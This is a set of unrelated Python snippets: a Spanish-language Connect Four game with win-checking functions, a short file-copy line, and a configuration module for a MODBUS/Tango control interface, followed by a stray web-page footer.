        # NOTE(review): randint(1, n-1) is not shifted by -1 like the human
        # branch, so the computer can never play column 0 — confirm the
        # intended range.
        columna = random.randint(1, n-1)
        print "Jugador {0} elige columna:{1}".format(jugador, columna)
    tablero, valida = tirar_ficha(tablero, columna, jugador)
    mostrar_tablero(tablero)
    return valida
def comprobar_fila(fila):
    """Scan a row for four consecutive identical pieces; return the winner
    message or "Sigue" if nobody has connected four."""
    for inicio in range(len(fila)):
        tramo = fila[inicio:inicio + 4]
        if tramo == [1, 1, 1, 1]:
            return "Jugador 1. Has ganado!!"
        if tramo == [2, 2, 2, 2]:
            return "Jugador 2. Has ganado!!"
    return "Sigue"
def comprobar_columna(columna):
    """Scan a column (given as a list) for four consecutive identical pieces;
    return the winner message or "Sigue"."""
    for inicio in range(len(columna)):
        segmento = columna[inicio:inicio + 4]
        if segmento == [1, 1, 1, 1]:
            return "Jugador 1. Has ganado!!"
        if segmento == [2, 2, 2, 2]:
            return "Jugador 2. Has ganado!!"
    return "Sigue"
def comprobar_diagonal(tablero):
    """Check both diagonal directions for four in a row; return the winner
    message or "Sigue".

    (The anti-diagonal win messages lack the trailing "!!" — preserved as-is
    from the original for identical behavior.)
    """
    n = len(tablero)
    for y in range(n):
        for x in range(n):
            # Down-right diagonal starting at (y, x).
            if y + 3 < n and x + 3 < n:
                linea = [tablero[y + k][x + k] for k in range(4)]
                if linea == [1, 1, 1, 1]:
                    return "Jugador 1. Has ganado!!"
                if linea == [2, 2, 2, 2]:
                    return "Jugador 2. Has ganado!!"
            # Down-left diagonal starting at (y, x).
            if y + 3 < n and x - 3 >= 0:
                linea = [tablero[y + k][x - k] for k in range(4)]
                if linea == [1, 1, 1, 1]:
                    return "Jugador 1. Has ganado"
                if linea == [2, 2, 2, 2]:
                    return "Jugador 2. Has ganado"
    return "Sigue"
def comprobar_estado_partida(tablero):
    """Check rows, then columns, then diagonals; return the first winner
    message found, or "Sigue" if the game continues."""
    for fila in tablero:
        veredicto = comprobar_fila(fila)
        if veredicto != "Sigue":
            return veredicto
    for indice in range(len(tablero)):
        veredicto = comprobar_columna(get_columna(tablero, indice))
        if veredicto != "Sigue":
            return veredicto
    # Diagonals are checked last; their verdict is final.
    return comprobar_diagonal(tablero)
# --- Entry point: build the board and alternate turns until someone wins ---
random.seed()
tablero, n = construir_tablero()
mostrar_tablero(tablero)
njugador = 0
end = False
while end == False:
    valida = jugada(tablero, njugador, n)
    if valida: # only advance the turn when the move was legal
        resultado = comprobar_estado_partida(tablero)
        if resultado == "Sigue":
            njugador += 1
        else:
            end = True
            print resultado
|
# Copy the contents of aux.txt into target1 (created/truncated by 'w+').
with open('target1','w+') as f, open('aux.txt', 'r+') as a:
    f.write(a.read())
|
# -*- coding: utf-8 -*-
# NOTE(review): `os` appears unused in this module chunk.
import os
### Print debug information to the console
MDEBUG = True
# MDEBUG = False
### Dump MODBUS register/flag values into the textEdit widget
# MODBUSOUT = True
MODBUSOUT = False
### Enable text output in the editor pane
TEXTEDIT = False
#TEXTEDIT = True
timer_sec = 3
# Font size used in the output pane.
fontSize = 10
# One-time settings.
# Window sizes with and without the output pane.
sizeWindowWithEdit = [1120, 650]
sizeWindowWithoutEdit = [800, 650]
# Path to the modulator's Tango server.
server_name = "tango://172.16.21.5:10000/test/rfq/read"
# Name of the method returning all registers and flags as JSON.
json_get = "ReadAllRegistersAndFlagsFromCacheInJson"
# Modbus polling timer interval — NOTE(review): this trailing comment likely
# describes timer_sec above; it sat detached at end of file in the original.
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.